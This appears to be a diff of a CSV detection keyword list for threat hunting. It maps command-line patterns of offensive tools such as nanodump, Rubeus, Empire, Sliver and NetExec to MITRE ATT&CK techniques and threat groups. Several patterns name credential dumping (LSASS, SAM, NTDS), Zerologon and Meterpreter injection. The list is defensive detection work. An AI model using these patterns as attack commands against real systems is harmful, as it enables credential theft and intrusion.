- T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"* sigflip.x86.*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"* SigLoader *","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"* --sign-domain *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* --sign-steal *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" "* Sigwhatever*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","0","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "* --silent -obf NixImports -o /tmp/*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" "* --silent-process-exit *","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "* silenttrinity.*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" -"* silver * /domain*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* silver * /ldap *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* silver * /passlastset *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* silver * /service:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* --single shadow.hashes*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* silver * /domain*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* silver * /ldap *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* silver * /passlastset *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* silver * /service:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* --single shadow.hashes*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "* sip-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* sip-call-spoof.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* sip-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* sip-log4shell.nse*","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","4","347","51","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z" "* sip-methods.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* sitadel.py*","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" -"* -SiteListFilePath * -B64Pass *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-System.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* --skip-crawl*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" -"*- --skippasswordcheck*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"* --skipregistryloggedon*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" +"* -SiteListFilePath * -B64Pass *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-System.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* --skip-crawl*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*- --skippasswordcheck*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --skipregistryloggedon*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" "* skypev2-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* sliver sliver*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"* smb * --dpapi *password*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* smb * --gen-relay-list *.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* smb * --lsa --log *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* smb * -M lsassy*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* smb * -M masky -o CA=*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* smb * -M msol *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* smb * -M ntlmv1 *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* smb * -M rdp -o ACTION=enable*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* smb * -M runasppl*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* smb * -M zerologon*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* smb * --ntds --log *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* smb * --sam --log *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* smb * -u * -p * * -M dfscoerce*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* smb * -u * -p * * --rid-brute*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* smb * -u * -p * * --shares --filter-shares *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* smb * -u * -p * * -X whoami --obfs*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* smb * -u * -p * -M enum_av*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* smb * -u * -p * -M enum_dns*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* smb * -u * -p * -M gpp_password*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* smb * -u * -p * -M met_inject *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" 